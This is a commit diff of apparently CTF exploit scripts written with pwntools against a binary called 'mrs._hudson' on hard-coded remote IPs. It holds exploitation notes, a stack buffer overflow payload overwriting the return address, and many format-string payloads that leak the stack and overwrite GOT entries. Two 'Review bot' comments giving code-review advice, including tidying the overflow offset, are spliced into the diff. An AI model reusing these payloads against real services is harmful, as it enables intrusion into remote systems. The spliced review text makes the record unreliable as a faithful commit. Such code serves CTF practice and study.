Commit 5760ea7d authored by Chris James's avatar Chris James

updated

parent 6e9aae31
0x00400680 == scanf
overwrite return address with 120 bytes (0x70 + 8)
rop chain:
0x004006f4 == ret
0x400500 == puts
need stack address
ret + 2qwords is stack addr
ret + 8qwords is stack addr
ret - 3qwords is stack addr
0x7ffdb6738de0
0x7ffdb6738e58
#!/usr/bin/env python2
from pwn import *
from IPython import embed
from binascii import hexlify,unhexlify
DEBUG=True
ips = ["146.185.168.172", "178.62.249.106"]
port = 54514
if DEBUG:
p = process("./mrs._hudson")
else:
p = remote(ips[0], port)
def log(message, sev=0):
msg = ""
if sev == 0:
......@@ -20,29 +27,15 @@ def log(message, sev=0):
msg += str(message)
print(msg)
def lengthTest(ip):
log("Length test on {}".format(ip))
maxLength = 2001
lengthStep = 100
log("maxLen: {}".format(maxLength))
log("lengthStep: {}".format(lengthStep))
for i in range(1, maxLength, lengthStep):
log("Connecting to: {}".format(ip), sev=1)
r = remote(ips[0], port)
log("number of bytes: {}".format(i))
log(r.readline())
log(r.send("\n"* i))
print(bytes(r.readline()))
r.close()
def main():
log("script starting")
lengthTest(ips[0])
raw_input()
p.sendline("A" * 0x78 + p64(0x4006f4))
embed()
p.close()
if __name__ == "__main__":
main()
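Review bot: If the `lengthTest(ips[0])` call in `main` is on the new side, it opens connections to the remote target unconditionally, while the `DEBUG` switch added at the top of the file only decides whether `p` is a local `process` or a `remote` socket — so a local debug run still probes the live service; guard it with `if not DEBUG: lengthTest(ips[0])` or drop the call, since `lengthTest` itself appears to be removed by this hunk. The payload `"A" * 0x78 + p64(0x4006f4)` repeats the magic offset from the notes file; name it, e.g. `RET_OFFSET = 0x70 + 8  # buffer + saved rbp, see notes`, so the offset and gadget can be changed without rereading the notes. The hunk lies inside `log`, whose `def` line starts outside the hunk.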
#!/usr/bin/env python2
from pwn import *
from IPython import embed
ips = ["146.185.168.172", "178.62.249.106"]
port = 54514
def log(message, sev=0):
msg = ""
if sev == 0:
msg += "[INFO] - "
if sev == 1:
msg += "[WARN] - "
if sev == 2:
msg += "[CRIT] - "
else:
msg += "\t"
msg += str(message)
print(msg)
def lengthTest(ip):
log("Length test on {}".format(ip))
maxLength = 2001
lengthStep = 100
log("maxLen: {}".format(maxLength))
log("lengthStep: {}".format(lengthStep))
for i in range(1, maxLength, lengthStep):
log("Connecting to: {}".format(ip), sev=1)
r = remote(ips[0], port)
log("number of bytes: {}".format(i))
log(r.readline())
log(r.send("\n"* i))
print(bytes(r.readline()))
r.close()
def main():
log("script starting")
lengthTest(ips[0])
embed()
if __name__ == "__main__":
main()
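Review bot: The severity prefix in `log` is wrong for every non-critical message: the trailing `else:` binds only to `if sev == 2`, so `sev=0` yields `"[INFO] - \t"` and `sev=1` yields `"[WARN] - \t"` before the message, and only `sev=2` avoids the tab. The three tests should form one chain — change `if sev == 1:` to `elif sev == 1:` and `if sev == 2:` to `elif sev == 2:` — so exactly one prefix is chosen. Separately, `lengthTest(ip)` logs the `ip` argument but connects with `r = remote(ips[0], port)`, so any other host passed in is silently ignored; use `remote(ip, port)`. If this file is only being deleted by the commit, disregard.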
......@@ -78,10 +78,10 @@ def patchBinary():
#p.sendline("%2$ln." + "%lx." * 20)
#p.sendline("%20$n.%1$x")
#target = 0x601018
#target = 0x601060
target = 0x600e10
#p.sendline("AA%59lx." + "BB%13$n." + "%1687lx." + "D%14$hn." + "EE%14$s." + p64(target + 2) + p64(target))
p.sendline("AA%20$s")
target = 0x601060
#target = 0x601020
p.sendline("AA%59lx." + "BB%13$n." + "%1687lx." + "D%14$hn." + "EE%14$s." + p64(target + 2) + p64(target))
#p.sendline("AA%20$s")
sleep(0.1)
output = p.read()
log(output)
......@@ -96,21 +96,39 @@ def patchBinary():
def leakStack():
words = []
#stackWords = [2, 5, 6, 9, 11, 12, 16, 20, 23, 25, 30]
#stackWords = [39, 40, 41, 45, 48, 51, 53, 54, 55, 56, 57, 58, 61]
#stackWords = [75, 91, 95]
stackWords = [9]
#stackWords = [2, 5, 6, 9, 11, 12, 16, 20, 23, 25, 30, 39, 40, 41, 45, 48, 51, 53, 54, 55, 56, 57, 58, 61, 75, 91, 95, 97]
#number 16?
#stackWords = [11]
#stackWords = [2, 5, 6, 9, 11, 12, 16, 20, 23]
#for i in range(1, 0x20):
for i in range(0xff):
#for i in range(128, 192):
for i in range(1):
#offsets = [8, 9, 10, 12, 13, ord('0'), ord('@'), ord('P'), 0xc9, 0xe2, 0xf9]
#offsets = [2]
#offsets = [97]
#for i in offsets:
#for i in stackWords:
try:
p = remote(ips[0], port)
except Exception as e:
return -1
log(p.readline())
#p.sendline("A%{}$lx.".format(str(i).zfill(2)))
#p.sendline("AA%{}$s.{}".format(str(i).zfill(2), chr(i)))
p.sendline("AAA%9$s.{}".format(chr(i)))
#p.sendline("%{}$lx.".format(str(i).zfill(3)))
#p.sendline("AA%{}$s.".format(str(i).zfill(2)))
#p.sendline("AAA%16$s." + "CCCC" * 13 + "BBB{}".format(chr(i)))
#p.sendline("AAA%16$s." + "CCCC" * 13 + "BBB\x0f")
#p.sendline("AA%16$lx." + ("A" * 55) + "{}".format(chr(i)))
#p.sendline("AA%11$s.{}".format(chr(i)))
#p.sendline("AA%10$lx")
#write 0x4006da in got @ 0x601020
#p.sendline("AA%59lx." + "B%13$lx." + "%1687lx." + "D%14$lx." + "E%15$lx." + p64(target + 2) + p64(target))
#p.sendline("AA%59lx." + "B%13$lx." + "%1687lx." + "D%14$lx." + "E%15$lx." + p64(0x601020))
p.sendline("AA%004lx" + "%13$hhn." + "%55808x." + "B%14$hn." + "CC%14$s." + p64(0x601021) + p64(0x601019))
#p.sendline("AA%59lx." + "BB%14$n." + "%1687lx." + "D%15$hn." + "EE%15$s." + "AA%16$n." + p64(target + 2) + p64(target) + '\x09')
#p.sendline("FF%699x." + "AAA%16$n." + "CCCC" * 11 + "BBB\x09")
sleep(0.1)
output = p.read()
log(output)
words.append(output)
......@@ -121,8 +139,8 @@ def main():
#dumpData()
#uncomment this for patching the binary/playing with basic format string primitive
#patchBinary()
leakStack()
patchBinary()
#leakStack()
if __name__ == "__main__":